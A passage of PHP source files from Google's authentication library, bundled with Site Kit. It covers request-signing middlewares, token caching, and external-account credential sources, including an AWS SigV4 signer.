Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Query; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; /** * SimpleMiddleware is a Guzzle Middleware that implements Google's Simple API * access. * * Requests are accessed using the Simple API access developer key. */ class SimpleMiddleware { /** * @var array<mixed> */ private $config; /** * Create a new Simple plugin. * * The configuration array expects one option * - key: required, otherwise InvalidArgumentException is thrown * * @param array<mixed> $config Configuration array */ public function __construct(array $config) { if (!isset($config['key'])) { throw new \InvalidArgumentException('requires a key to have been set'); } $this->config = \array_merge(['key' => null], $config); } /** * Updates the request query with the developer key if auth is set to simple. * * use Google\Auth\Middleware\SimpleMiddleware; * use GuzzleHttp\Client; * use GuzzleHttp\HandlerStack; * * $my_key = 'is not the same as yours'; * $middleware = new SimpleMiddleware(['key' => $my_key]); * $stack = HandlerStack::create(); * $stack->push($middleware); * * $client = new Client([ * 'handler' => $stack, * 'base_uri' => 'https://www.googleapis.com/discovery/v1/', * 'auth' => 'simple' * ]); * * $res = $client->get('drive/v2/rest'); * * @param callable $handler * @return \Closure */ public function __invoke(callable $handler) { return function (\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array $options) use($handler) { // Requests using "auth"="scoped" will be authorized. if (!isset($options['auth']) || $options['auth'] !== 'simple') { return $handler($request, $options); } $query = \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Query::parse($request->getUri()->getQuery()); $params = \array_merge($query, $this->config); $uri = $request->getUri()->withQuery(\Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Query::build($params)); $request = $request->withUri($uri); return $handler($request, $options); }; } } <?php /* * Copyright 2015 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Auth\Middleware; use Google\Site_Kit_Dependencies\Google\Auth\FetchAuthTokenInterface; use Google\Site_Kit_Dependencies\Google\Auth\GetQuotaProjectInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; /** * ProxyAuthTokenMiddleware is a Guzzle Middleware that adds an Authorization header * provided by an object implementing FetchAuthTokenInterface. * * The FetchAuthTokenInterface#fetchAuthToken is used to obtain a hash; one of * the values value in that hash is added as the authorization header. * * Requests will be accessed with the authorization header: * * 'proxy-authorization' 'Bearer <value of auth_token>' */ class ProxyAuthTokenMiddleware { /** * @var callable */ private $httpHandler; /** * @var FetchAuthTokenInterface */ private $fetcher; /** * @var ?callable */ private $tokenCallback; /** * Creates a new ProxyAuthTokenMiddleware. * * @param FetchAuthTokenInterface $fetcher is used to fetch the auth token * @param callable $httpHandler (optional) callback which delivers psr7 request * @param callable $tokenCallback (optional) function to be called when a new token is fetched. */ public function __construct(\Google\Site_Kit_Dependencies\Google\Auth\FetchAuthTokenInterface $fetcher, ?callable $httpHandler = null, ?callable $tokenCallback = null) { $this->fetcher = $fetcher; $this->httpHandler = $httpHandler; $this->tokenCallback = $tokenCallback; } /** * Updates the request with an Authorization header when auth is 'google_auth'. * * use Google\Auth\Middleware\ProxyAuthTokenMiddleware; * use Google\Auth\OAuth2; * use GuzzleHttp\Client; * use GuzzleHttp\HandlerStack; * * $config = [..<oauth config param>.]; * $oauth2 = new OAuth2($config) * $middleware = new ProxyAuthTokenMiddleware($oauth2); * $stack = HandlerStack::create(); * $stack->push($middleware); * * $client = new Client([ * 'handler' => $stack, * 'base_uri' => 'https://www.googleapis.com/taskqueue/v1beta2/projects/', * 'proxy_auth' => 'google_auth' // authorize all requests * ]); * * $res = $client->get('myproject/taskqueues/myqueue'); * * @param callable $handler * @return \Closure */ public function __invoke(callable $handler) { return function (\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array $options) use($handler) { // Requests using "proxy_auth"="google_auth" will be authorized. if (!isset($options['proxy_auth']) || $options['proxy_auth'] !== 'google_auth') { return $handler($request, $options); } $request = $request->withHeader('proxy-authorization', 'Bearer ' . $this->fetchToken()); if ($quotaProject = $this->getQuotaProject()) { $request = $request->withHeader(\Google\Site_Kit_Dependencies\Google\Auth\GetQuotaProjectInterface::X_GOOG_USER_PROJECT_HEADER, $quotaProject); } return $handler($request, $options); }; } /** * Call fetcher to fetch the token. * * @return string|null */ private function fetchToken() { $auth_tokens = $this->fetcher->fetchAuthToken($this->httpHandler); if (\array_key_exists('access_token', $auth_tokens)) { // notify the callback if applicable if ($this->tokenCallback) { \call_user_func($this->tokenCallback, $this->fetcher->getCacheKey(), $auth_tokens['access_token']); } return $auth_tokens['access_token']; } if (\array_key_exists('id_token', $auth_tokens)) { return $auth_tokens['id_token']; } return null; } /** * @return string|null; */ private function getQuotaProject() { if ($this->fetcher instanceof \Google\Site_Kit_Dependencies\Google\Auth\GetQuotaProjectInterface) { return $this->fetcher->getQuotaProject(); } return null; } } <?php /* * Copyright 2015 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Auth\Middleware; use Google\Site_Kit_Dependencies\Google\Auth\CacheTrait; use Google\Site_Kit_Dependencies\Psr\Cache\CacheItemPoolInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; /** * ScopedAccessTokenMiddleware is a Guzzle Middleware that adds an Authorization * header provided by a closure. * * The closure returns an access token, taking the scope, either a single * string or an array of strings, as its value. If provided, a cache will be * used to preserve the access token for a given lifetime. * * Requests will be accessed with the authorization header: * * 'authorization' 'Bearer <value of auth_token>' */ class ScopedAccessTokenMiddleware { use CacheTrait; const DEFAULT_CACHE_LIFETIME = 1500; /** * @var callable */ private $tokenFunc; /** * @var array<string>|string */ private $scopes; /** * Creates a new ScopedAccessTokenMiddleware. * * @param callable $tokenFunc a token generator function * @param array<string>|string $scopes the token authentication scopes * @param array<mixed> $cacheConfig configuration for the cache when it's present * @param CacheItemPoolInterface $cache an implementation of CacheItemPoolInterface */ public function __construct(callable $tokenFunc, $scopes, ?array $cacheConfig = null, ?\Google\Site_Kit_Dependencies\Psr\Cache\CacheItemPoolInterface $cache = null) { $this->tokenFunc = $tokenFunc; if (!(\is_string($scopes) || \is_array($scopes))) { throw new \InvalidArgumentException('wants scope should be string or array'); } $this->scopes = $scopes; if (!\is_null($cache)) { $this->cache = $cache; $this->cacheConfig = \array_merge(['lifetime' => self::DEFAULT_CACHE_LIFETIME, 'prefix' => ''], $cacheConfig); } } /** * Updates the request with an Authorization header when auth is 'scoped'. * * E.g this could be used to authenticate using the AppEngine * AppIdentityService. * * use google\appengine\api\app_identity\AppIdentityService; * use Google\Auth\Middleware\ScopedAccessTokenMiddleware; * use GuzzleHttp\Client; * use GuzzleHttp\HandlerStack; * * $scope = 'https://www.googleapis.com/auth/taskqueue' * $middleware = new ScopedAccessTokenMiddleware( * 'AppIdentityService::getAccessToken', * $scope, * [ 'prefix' => 'Google\Auth\ScopedAccessToken::' ], * $cache = new Memcache() * ); * $stack = HandlerStack::create(); * $stack->push($middleware); * * $client = new Client([ * 'handler' => $stack, * 'base_url' => 'https://www.googleapis.com/taskqueue/v1beta2/projects/', * 'auth' => 'scoped' // authorize all requests * ]); * * $res = $client->get('myproject/taskqueues/myqueue'); * * @param callable $handler * @return \Closure */ public function __invoke(callable $handler) { return function (\Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface $request, array $options) use($handler) { // Requests using "auth"="scoped" will be authorized. if (!isset($options['auth']) || $options['auth'] !== 'scoped') { return $handler($request, $options); } $request = $request->withHeader('authorization', 'Bearer ' . $this->fetchToken()); return $handler($request, $options); }; } /** * @return string */ private function getCacheKey() { $key = null; if (\is_string($this->scopes)) { $key .= $this->scopes; } elseif (\is_array($this->scopes)) { $key .= \implode(':', $this->scopes); } return $key; } /** * Determine if token is available in the cache, if not call tokenFunc to * fetch it. * * @return string */ private function fetchToken() { $cacheKey = $this->getCacheKey(); $cached = $this->getCachedValue($cacheKey); if (!empty($cached)) { return $cached; } $token = \call_user_func($this->tokenFunc, $this->scopes); $this->setCachedValue($cacheKey, $token); return $token; } } <?php /* * Copyright 2015 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Auth; use Google\Site_Kit_Dependencies\Psr\Cache\CacheItemPoolInterface; trait CacheTrait { /** * @var int */ private $maxKeyLength = 64; /** * @var array<mixed> */ private $cacheConfig; /** * @var ?CacheItemPoolInterface */ private $cache; /** * Gets the cached value if it is present in the cache when that is * available. * * @param mixed $k * * @return mixed */ private function getCachedValue($k) { if (\is_null($this->cache)) { return null; } $key = $this->getFullCacheKey($k); if (\is_null($key)) { return null; } $cacheItem = $this->cache->getItem($key); if ($cacheItem->isHit()) { return $cacheItem->get(); } } /** * Saves the value in the cache when that is available. * * @param mixed $k * @param mixed $v * @return mixed */ private function setCachedValue($k, $v) { if (\is_null($this->cache)) { return null; } $key = $this->getFullCacheKey($k); if (\is_null($key)) { return null; } $cacheItem = $this->cache->getItem($key); $cacheItem->set($v); $cacheItem->expiresAfter($this->cacheConfig['lifetime']); return $this->cache->save($cacheItem); } /** * @param null|string $key * @return null|string */ private function getFullCacheKey($key) { if (\is_null($key)) { return null; } $key = $this->cacheConfig['prefix'] . $key; // ensure we do not have illegal characters $key = \preg_replace('|[^a-zA-Z0-9_\\.!]|', '', $key); // Hash keys if they exceed $maxKeyLength (defaults to 64) if ($this->maxKeyLength && \strlen($key) > $this->maxKeyLength) { $key = \substr(\hash('sha256', $key), 0, $this->maxKeyLength); } return $key; } } <?php /* * Copyright 2023 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Auth\CredentialSource; use Google\Site_Kit_Dependencies\Google\Auth\ExternalAccountCredentialSourceInterface; use InvalidArgumentException; use UnexpectedValueException; /** * Retrieve a token from a file. */ class FileSource implements \Google\Site_Kit_Dependencies\Google\Auth\ExternalAccountCredentialSourceInterface { private string $file; private ?string $format; private ?string $subjectTokenFieldName; /** * @param string $file The file to read the subject token from. * @param string $format The format of the token in the file. Can be null or "json". * @param string $subjectTokenFieldName The name of the field containing the token in the file. This is required * when format is "json". */ public function __construct(string $file, ?string $format = null, ?string $subjectTokenFieldName = null) { $this->file = $file; if ($format === 'json' && \is_null($subjectTokenFieldName)) { throw new \InvalidArgumentException('subject_token_field_name must be set when format is JSON'); } $this->format = $format; $this->subjectTokenFieldName = $subjectTokenFieldName; } public function fetchSubjectToken(?callable $httpHandler = null) : string { $contents = \file_get_contents($this->file); if ($this->format === 'json') { if (!($json = \json_decode((string) $contents, \true))) { throw new \UnexpectedValueException('Unable to decode JSON file'); } if (!isset($json[$this->subjectTokenFieldName])) { throw new \UnexpectedValueException('subject_token_field_name not found in JSON file'); } $contents = $json[$this->subjectTokenFieldName]; } return $contents; } } <?php /* * Copyright 2023 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Auth\CredentialSource; use Google\Site_Kit_Dependencies\Google\Auth\ExternalAccountCredentialSourceInterface; use Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpClientCache; use Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpHandlerFactory; use Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Request; use InvalidArgumentException; use UnexpectedValueException; /** * Retrieve a token from a URL. */ class UrlSource implements \Google\Site_Kit_Dependencies\Google\Auth\ExternalAccountCredentialSourceInterface { private string $url; private ?string $format; private ?string $subjectTokenFieldName; /** * @var array<string, string|string[]> */ private ?array $headers; /** * @param string $url The URL to fetch the subject token from. * @param string $format The format of the token in the response. Can be null or "json". * @param string $subjectTokenFieldName The name of the field containing the token in the response. This is required * when format is "json". * @param array<string, string|string[]> $headers Request headers to send in with the request to the URL. */ public function __construct(string $url, ?string $format = null, ?string $subjectTokenFieldName = null, ?array $headers = null) { $this->url = $url; if ($format === 'json' && \is_null($subjectTokenFieldName)) { throw new \InvalidArgumentException('subject_token_field_name must be set when format is JSON'); } $this->format = $format; $this->subjectTokenFieldName = $subjectTokenFieldName; $this->headers = $headers; } public function fetchSubjectToken(?callable $httpHandler = null) : string { if (\is_null($httpHandler)) { $httpHandler = \Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpHandlerFactory::build(\Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpClientCache::getHttpClient()); } $request = new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Request('GET', $this->url, $this->headers ?: []); $response = $httpHandler($request); $body = (string) $response->getBody(); if ($this->format === 'json') { if (!($json = \json_decode((string) $body, \true))) { throw new \UnexpectedValueException('Unable to decode JSON response'); } if (!isset($json[$this->subjectTokenFieldName])) { throw new \UnexpectedValueException('subject_token_field_name not found in JSON file'); } $body = $json[$this->subjectTokenFieldName]; } return $body; } } <?php /* * Copyright 2023 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Auth\CredentialSource; use Google\Site_Kit_Dependencies\Google\Auth\ExternalAccountCredentialSourceInterface; use Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpClientCache; use Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpHandlerFactory; use Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Request; /** * Authenticates requests using AWS credentials. */ class AwsNativeSource implements \Google\Site_Kit_Dependencies\Google\Auth\ExternalAccountCredentialSourceInterface { private const CRED_VERIFICATION_QUERY = 'Action=GetCallerIdentity&Version=2011-06-15'; private string $audience; private string $regionalCredVerificationUrl; private ?string $regionUrl; private ?string $securityCredentialsUrl; private ?string $imdsv2SessionTokenUrl; /** * @param string $audience The audience for the credential. * @param string $regionalCredVerificationUrl The regional AWS GetCallerIdentity action URL used to determine the * AWS account ID and its roles. This is not called by this library, but * is sent in the subject token to be called by the STS token server. * @param string|null $regionUrl This URL should be used to determine the current AWS region needed for the signed * request construction. * @param string|null $securityCredentialsUrl The AWS metadata server URL used to retrieve the access key, secret * key and security token needed to sign the GetCallerIdentity request. * @param string|null $imdsv2SessionTokenUrl Presence of this URL enforces the auth libraries to fetch a Session * Token from AWS. This field is required for EC2 instances using IMDSv2. */ public function __construct(string $audience, string $regionalCredVerificationUrl, ?string $regionUrl = null, ?string $securityCredentialsUrl = null, ?string $imdsv2SessionTokenUrl = null) { $this->audience = $audience; $this->regionalCredVerificationUrl = $regionalCredVerificationUrl; $this->regionUrl = $regionUrl; $this->securityCredentialsUrl = $securityCredentialsUrl; $this->imdsv2SessionTokenUrl = $imdsv2SessionTokenUrl; } public function fetchSubjectToken(?callable $httpHandler = null) : string { if (\is_null($httpHandler)) { $httpHandler = \Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpHandlerFactory::build(\Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpClientCache::getHttpClient()); } $headers = []; if ($this->imdsv2SessionTokenUrl) { $headers = ['X-aws-ec2-metadata-token' => self::getImdsV2SessionToken($this->imdsv2SessionTokenUrl, $httpHandler)]; } if (!($signingVars = self::getSigningVarsFromEnv())) { if (!$this->securityCredentialsUrl) { throw new \LogicException('Unable to get credentials from ENV, and no security credentials URL provided'); } $signingVars = self::getSigningVarsFromUrl($httpHandler, $this->securityCredentialsUrl, self::getRoleName($httpHandler, $this->securityCredentialsUrl, $headers), $headers); } if (!($region = self::getRegionFromEnv())) { if (!$this->regionUrl) { throw new \LogicException('Unable to get region from ENV, and no region URL provided'); } $region = self::getRegionFromUrl($httpHandler, $this->regionUrl, $headers); } $url = \str_replace('{region}', $region, $this->regionalCredVerificationUrl); $host = \parse_url($url)['host'] ?? ''; // From here we use the signing vars to create the signed request to receive a token [$accessKeyId, $secretAccessKey, $securityToken] = $signingVars; $headers = self::getSignedRequestHeaders($region, $host, $accessKeyId, $secretAccessKey, $securityToken); // Inject x-goog-cloud-target-resource into header $headers['x-goog-cloud-target-resource'] = $this->audience; // Format headers as they're expected in the subject token $formattedHeaders = \array_map(fn($k, $v) => ['key' => $k, 'value' => $v], \array_keys($headers), $headers); $request = ['headers' => $formattedHeaders, 'method' => 'POST', 'url' => $url]; return \urlencode(\json_encode($request) ?: ''); } /** * @internal */ public static function getImdsV2SessionToken(string $imdsV2Url, callable $httpHandler) : string { $headers = ['X-aws-ec2-metadata-token-ttl-seconds' => '21600']; $request = new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Request('PUT', $imdsV2Url, $headers); $response = $httpHandler($request); return (string) $response->getBody(); } /** * @see http://docs.aws.amazon.com/general/latest/gr/sigv4-create-canonical-request.html * * @internal * * @return array<string, string> */ public static function getSignedRequestHeaders(string $region, string $host, string $accessKeyId, string $secretAccessKey, ?string $securityToken) : array { $service = 'sts'; # Create a date for headers and the credential string in ISO-8601 format $amzdate = \gmdate('Ymd\\THis\\Z'); $datestamp = \gmdate('Ymd'); # Date w/o time, used in credential scope # Create the canonical headers and signed headers. Header names # must be trimmed and lowercase, and sorted in code point order from # low to high. Note that there is a trailing \n. $canonicalHeaders = \sprintf("host:%s\nx-amz-date:%s\n", $host, $amzdate); if ($securityToken) { $canonicalHeaders .= \sprintf("x-amz-security-token:%s\n", $securityToken); } # Step 5: Create the list of signed headers. This lists the headers # in the canonicalHeaders list, delimited with ";" and in alpha order. # Note: The request can include any headers; $canonicalHeaders and # $signedHeaders lists those that you want to be included in the # hash of the request. "Host" and "x-amz-date" are always required. $signedHeaders = 'host;x-amz-date'; if ($securityToken) { $signedHeaders .= ';x-amz-security-token'; } # Step 6: Create payload hash (hash of the request body content). For GET # requests, the payload is an empty string (""). $payloadHash = \hash('sha256', ''); # Step 7: Combine elements to create canonical request $canonicalRequest = \implode("\n", [ 'POST', // method '/', // canonical URL self::CRED_VERIFICATION_QUERY, // query string $canonicalHeaders, $signedHeaders, $payloadHash, ]); # ************* TASK 2: CREATE THE STRING TO SIGN************* # Match the algorithm to the hashing algorithm you use, either SHA-1 or # SHA-256 (recommended) $algorithm = 'AWS4-HMAC-SHA256'; $scope = \implode('/', [$datestamp, $region, $service, 'aws4_request']); $stringToSign = \implode("\n", [$algorithm, $amzdate, $scope, \hash('sha256', $canonicalRequest)]); # ************* TASK 3: CALCULATE THE SIGNATURE ************* # Create the signing key using the function defined above. // (done above) $signingKey = self::getSignatureKey($secretAccessKey, $datestamp, $region, $service); # Sign the string_to_sign using the signing_key $signature = \bin2hex(self::hmacSign($signingKey, $stringToSign)); # ************* TASK 4: ADD SIGNING INFORMATION TO THE REQUEST ************* # The signing information can be either in a query string value or in # a header named Authorization. This code shows how to use a header. # Create authorization header and add to request headers $authorizationHeader = \sprintf('%s Credential=%s/%s, SignedHeaders=%s, Signature=%s', $algorithm, $accessKeyId, $scope, $signedHeaders, $signature); # The request can include any headers, but MUST include "host", "x-amz-date", # and (for this scenario) "Authorization". "host" and "x-amz-date" must # be included in the canonical_headers and signed_headers, as noted # earlier. Order here is not significant. $headers = ['host' => $host, 'x-amz-date' => $amzdate, 'Authorization' => $authorizationHeader]; if ($securityToken) { $headers['x-amz-security-token'] = $securityToken; } return $headers; } /** * @internal */ public static function getRegionFromEnv() : ?string { $region = \getenv('AWS_REGION'); if (empty($region)) { $region = \getenv('AWS_DEFAULT_REGION'); } return $region ?: null; } /** * @internal * * @param callable $httpHandler * @param string $regionUrl * @param array<string, string|string[]> $headers Request headers to send in with the request. */ public static function getRegionFromUrl(callable $httpHandler, string $regionUrl, array $headers) : string { // get the region/zone from the region URL $regionRequest = new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Request('GET', $regionUrl, $headers); $regionResponse = $httpHandler($regionRequest); // Remove last character. For example, if us-east-2b is returned, // the region would be us-east-2. return \substr((string) $regionResponse->getBody(), 0, -1); } /** * @internal * * @param callable $httpHandler * @param string $securityCredentialsUrl * @param array<string, string|string[]> $headers Request headers to send in with the request. */ public static function getRoleName(callable $httpHandler, string $securityCredentialsUrl, array $headers) : string { // Get the AWS role name $roleRequest = new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Request('GET', $securityCredentialsUrl, $headers); $roleResponse = $httpHandler($roleRequest); $roleName = (string) $roleResponse->getBody(); return $roleName; } /** * @internal * * @param callable $httpHandler * @param string $securityCredentialsUrl * @param array<string, string|string[]> $headers Request headers to send in with the request. * @return array{string, string, ?string} */ public static function getSigningVarsFromUrl(callable $httpHandler, string $securityCredentialsUrl, string $roleName, array $headers) : array { // Get the AWS credentials $credsRequest = new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Request('GET', $securityCredentialsUrl . '/' . $roleName, $headers); $credsResponse = $httpHandler($credsRequest); $awsCreds = \json_decode((string) $credsResponse->getBody(), \true); return [ $awsCreds['AccessKeyId'], // accessKeyId $awsCreds['SecretAccessKey'], // secretAccessKey $awsCreds['Token'], ]; } /** * @internal * * @return array{string, string, ?string} */ public static function getSigningVarsFromEnv() : ?array { $accessKeyId = \getenv('AWS_ACCESS_KEY_ID'); $secretAccessKey = \getenv('AWS_SECRET_ACCESS_KEY'); if ($accessKeyId && $secretAccessKey) { return [$accessKeyId, $secretAccessKey, \getenv('AWS_SESSION_TOKEN') ?: null]; } return null; } /** * Return HMAC hash in binary string */ private static function hmacSign(string $key, string $msg) : string { return \hash_hmac('sha256', self::utf8Encode($msg), $key, \true); } /** * @TODO add a fallback when mbstring is not available */ private static function utf8Encode(string $string) : string { return \mb_convert_encoding($string, 'UTF-8', 'ISO-8859-1'); } private static function getSignatureKey(string $key, string $dateStamp, string $regionName, string $serviceName) : string { $kDate = self::hmacSign(self::utf8Encode('AWS4' . $key), $dateStamp); $kRegion = self::hmacSign($kDate, $regionName); $kService = self::hmacSign($kRegion, $serviceName); $kSigning = self::hmacSign($kService, 'aws4_request'); return $kSigning; } } <?php /* * Copyright 2015 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Auth; /** * An interface implemented by objects that can fetch auth tokens. */ interface FetchAuthTokenInterface { /** * Fetches the auth tokens based on the current state. * * @param callable $httpHandler callback which delivers psr7 request * @return array<mixed> a hash of auth tokens */ public function fetchAuthToken(?callable $httpHandler = null); /** * Obtains a key that can used to cache the results of #fetchAuthToken. * * If the value is empty, the auth token is not cached. * * @return string a key that may be used to cache the auth token. */ public function getCacheKey(); /** * Returns an associative array with the token and * expiration time. * * @return null|array<mixed> { * The last received access token. * * @type string $access_token The access token string. * @type int $expires_at The time the token expires as a UNIX timestamp. * } */ public function getLastReceivedToken(); } <?php /* * Copyright 2022 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Auth; use Exception; use Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpClientCache; use Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpHandlerFactory; trait IamSignerTrait { /** * @var Iam|null */ private $iam; /** * Sign a string using the default service account private key. * * This implementation uses IAM's signBlob API. * * @see https://cloud.google.com/iam/credentials/reference/rest/v1/projects.serviceAccounts/signBlob SignBlob * * @param string $stringToSign The string to sign. * @param bool $forceOpenSsl [optional] Does not apply to this credentials * type. * @param string $accessToken The access token to use to sign the blob. If * provided, saves a call to the metadata server for a new access * token. **Defaults to** `null`. * @return string * @throws Exception */ public function signBlob($stringToSign, $forceOpenSsl = \false, $accessToken = null) { $httpHandler = \Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpHandlerFactory::build(\Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpClientCache::getHttpClient()); // Providing a signer is useful for testing, but it's undocumented // because it's not something a user would generally need to do. $signer = $this->iam; if (!$signer) { $signer = $this instanceof \Google\Site_Kit_Dependencies\Google\Auth\GetUniverseDomainInterface ? new \Google\Site_Kit_Dependencies\Google\Auth\Iam($httpHandler, $this->getUniverseDomain()) : new \Google\Site_Kit_Dependencies\Google\Auth\Iam($httpHandler); } $email = $this->getClientName($httpHandler); if (\is_null($accessToken)) { $previousToken = $this->getLastReceivedToken(); $accessToken = $previousToken ? $previousToken['access_token'] : $this->fetchAuthToken($httpHandler)['access_token']; } return $signer->signBlob($email, $accessToken, $stringToSign); } } <?php /* * Copyright 2023 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Auth; /** * An interface implemented by objects that can get universe domain for Google Cloud APIs. */ interface GetUniverseDomainInterface { const DEFAULT_UNIVERSE_DOMAIN = 'googleapis.com'; /** * Get the universe domain from the credential. This should always return * a string, and default to "googleapis.com" if no universe domain is * configured. * * @return string */ public function getUniverseDomain() : string; } <?php /* * Copyright 2020 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Auth; /** * Describes a Credentials object which supports updating request metadata * (request headers). */ interface UpdateMetadataInterface { const AUTH_METADATA_KEY = 'authorization'; /** * Updates metadata with the authorization token. * * @param array<mixed> $metadata metadata hashmap * @param string $authUri optional auth uri * @param callable $httpHandler callback which delivers psr7 request * @return array<mixed> updated metadata hashmap */ public function updateMetadata($metadata, $authUri = null, ?callable $httpHandler = null); } <?php /* * Copyright 2023 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Auth; /** * Provides shared methods for updating request metadata (request headers). * * Should implement {@see UpdateMetadataInterface} and {@see FetchAuthTokenInterface}. * * @internal */ trait UpdateMetadataTrait { /** * export a callback function which updates runtime metadata. * * @return callable updateMetadata function * @deprecated */ public function getUpdateMetadataFunc() { return [$this, 'updateMetadata']; } /** * Updates metadata with the authorization token. * * @param array<mixed> $metadata metadata hashmap * @param string $authUri optional auth uri * @param callable $httpHandler callback which delivers psr7 request * @return array<mixed> updated metadata hashmap */ public function updateMetadata($metadata, $authUri = null, ?callable $httpHandler = null) { if (isset($metadata[self::AUTH_METADATA_KEY])) { // Auth metadata has already been set return $metadata; } $result = $this->fetchAuthToken($httpHandler); $metadata_copy = $metadata; if (isset($result['access_token'])) { $metadata_copy[self::AUTH_METADATA_KEY] = ['Bearer ' . $result['access_token']]; } elseif (isset($result['id_token'])) { $metadata_copy[self::AUTH_METADATA_KEY] = ['Bearer ' . $result['id_token']]; } return $metadata_copy; } } <?php /** * Copyright 2015 Google Inc. All Rights Reserved. * * Licensed under the Apache 